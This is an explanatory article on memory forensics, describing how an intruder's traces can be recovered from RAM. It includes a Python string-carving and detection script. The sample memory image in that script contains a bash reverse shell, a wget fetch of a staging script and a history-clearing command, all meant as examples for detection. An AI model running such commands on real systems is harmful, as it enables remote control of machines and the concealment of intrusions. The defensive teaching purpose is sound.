If you watch television cop shows, there is a good chance you have heard the word forensics, and even if you could not define it exactly, you probably have a good idea of what it is from the shows. Just like in the real world, the virtual world needs crimes solved as well, and just like on TV, forensics is one way to get it done.
As you well know, a lot of crimes happen on the internet, and there has to be some way to solve them. As I said in the previous paragraph, forensics is one way. But you might be asking yourself a few questions based on what you have seen on TV: how can we use forensics on a computer, and how do we do it online? That is what this article is about. I am going to show you how forensics works in the digital world, both on the network and on your physical computer. So let's take a look at this world now.
How forensics works on your computer
When you use your computer, both online and off, it leaves trails that you probably do not know about. To know every trail left on the computer itself, you would need to have studied how the operating system and the hardware underneath it actually work. Even if you work on a computer all day there is a good chance you do not know everything that goes on under the hood; there is simply too much to know unless you study it. The same goes for online activity. One reason cyber criminals get away with so much online is that they have studied networking at some point, and they use what they know about networks to hide their tracks.
When you need to find out what a criminal has done on a computer, online or off, you have to know where to look for clues. That is where digital forensics comes in. Even if the intruder erased some of the traces they left while poking around your computer, if you look deep enough there is a chance they did not erase them all. Most intruders will remember to delete the logs written during their visit and to clear the shell history of the commands they ran on your computer or server, but unless they are very good, there is a good chance they forgot one thing.
There is a good chance they forgot about the memory installed in the computer. RAM is volatile: its contents are lost the moment the power is cut. But as long as the machine is still powered on and there has not been much activity since the intrusion, you may be able to mine memory for clues about who has been on it. Everything the computer processes passes through RAM on its way to the processor's caches and registers, so whatever the criminal did, some of that data sat in memory at some point: the command lines they typed, the addresses they connected to, the scripts they downloaded and then deleted. So you take a dump of RAM (a memory image, acquired with a tool run on the live machine, such as LiME on Linux or WinPmem on Windows) and search it for traces of the attacker, by hand or with an analysis framework like Volatility. That is where forensics comes in. One caveat a practitioner will insist on: capture memory first, before the machine is shut down or anything else is done to it, because the acquisition tool itself touches memory and every process you start afterwards overwrites more of what you are trying to recover.
The reason this works is that releasing memory does not wipe it. A manual free() in C or C++ only marks the block as available for reuse, and a garbage collector in a managed language does the same thing; neither one zeroes the old bytes. The data stays in place until something else is written over it. Even when a process exits and its memory goes back to the operating system, the physical pages keep their contents until they are handed out again. So when you take the memory dump there is a good chance you will find a clue: a command line from a shell that has since been closed, a fragment of a downloaded script that was deleted from disk, or the remote address the attacker connected to.
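Here is a small added example of what "mining the memory" looks like in practice. It is not from this article and not part of any forensic tool; it is a Python script I have added that does the same job as running strings over a raw memory image and grepping the output for things an intruder leaves behind. The memory image is a constructed byte string, not a real dump, and every fragment in it (the command lines, the 203.0.113.5 address, the partly overwritten buffer) is made up for the demonstration; the function and pattern names are mine too. The last fragment shows the failure mode the text describes: a buffer whose front half has already been reused is recovered only as a stub that no longer matches anything.

```python
import re
from typing import Dict, List, Set

# Constructed stand-in for a raw memory image. A real one would come from a
# live acquisition tool (LiME on Linux, WinPmem on Windows); this is just
# binary filler around the kinds of fragments an intruder's shell leaves in RAM.
SAMPLE_IMAGE = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9                  # header residue, too short to count
    + b"bash -i >& /dev/tcp/203.0.113.5/4444 0>&1\x00"   # reverse shell still resident
    + b"\x8a\x13\x00\x00\xff\xfe" * 3                     # unrelated binary data
    + b"wget http://203.0.113.5/p.sh -O /tmp/p.sh\x00"    # download that has since been deleted
    + b"\x00" * 8
    + b"history -c; rm -f ~/.bash_history\x00"            # the anti-forensics command itself
    + b"\x01\x02\x03"
    + b"\x00" * 10 + b"/x.sh -o /tmp/.x\x00"              # buffer partly reused: front half gone
    + b"\x00" * 16
)

# Patterns for the things an analyst looks for first. Constructed for this
# example, not a complete rule set.
INDICATORS = {
    "reverse_shell": re.compile(r"/dev/tcp/|bash -i|\bnc (-e|-c) "),
    "download_exec": re.compile(r"\b(wget|curl)\b.*https?://"),
    "anti_forensics": re.compile(r"history -c|\.bash_history|unset HISTFILE"),
}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_strings(image: bytes, min_len: int = 6) -> List[str]:
    """Same idea as strings(1): every run of printable ASCII of at least min_len bytes.

    Fragments shorter than min_len, and anything already overwritten with
    non-printable bytes, never show up at all. That is the caveat from the text:
    once the attacker's data has been reused, a scan cannot bring it back.
    """
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, image)]


def scan_image(image: bytes) -> Dict[str, List[str]]:
    """Run each indicator over the recovered strings; hits are keyed by indicator name."""
    hits: Dict[str, List[str]] = {name: [] for name in INDICATORS}
    for s in extract_strings(image):
        for name, pat in INDICATORS.items():
            if pat.search(s):
                hits[name].append(s)
    return hits


def remote_addresses(image: bytes) -> Set[str]:
    """Every IPv4 address in the recovered strings: candidate attacker infrastructure."""
    found: Set[str] = set()
    for s in extract_strings(image):
        found.update(IPV4.findall(s))
    return found


def unattributed_fragments(image: bytes) -> List[str]:
    """Recovered strings that match no indicator, e.g. partly overwritten buffers."""
    return [s for s in extract_strings(image)
            if not any(p.search(s) for p in INDICATORS.values())]


if __name__ == "__main__":
    for name, matches in scan_image(SAMPLE_IMAGE).items():
        for m in matches:
            print(f"[{name}] {m}")
    print("remote addresses:", sorted(remote_addresses(SAMPLE_IMAGE)))
    print("unattributed fragments:", unattributed_fragments(SAMPLE_IMAGE))
```

Run it and you get the reverse shell, the download command and the history-clearing command back out of the image, plus the one address they all point at, even though on disk the history file is gone. The wget line shows why this matters: the staging script may have been deleted, but the command that fetched it is still sitting in RAM. On a real image you would feed the same idea a few gigabytes at a time and, in practice, let Volatility reconstruct processes, connections and command lines rather than relying on raw string carving alone.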
But this is not foolproof by any means. If the freed memory has already been reused and overwritten, if the machine has been rebooted or powered off, or if the attacker used a tool that deliberately scrubs its own buffers before releasing them, there may be nothing left to find. So while mining memory is a good method, it is one tool among several, and it only pays off if the memory is captured early, before the system is shut down or put back to heavy use.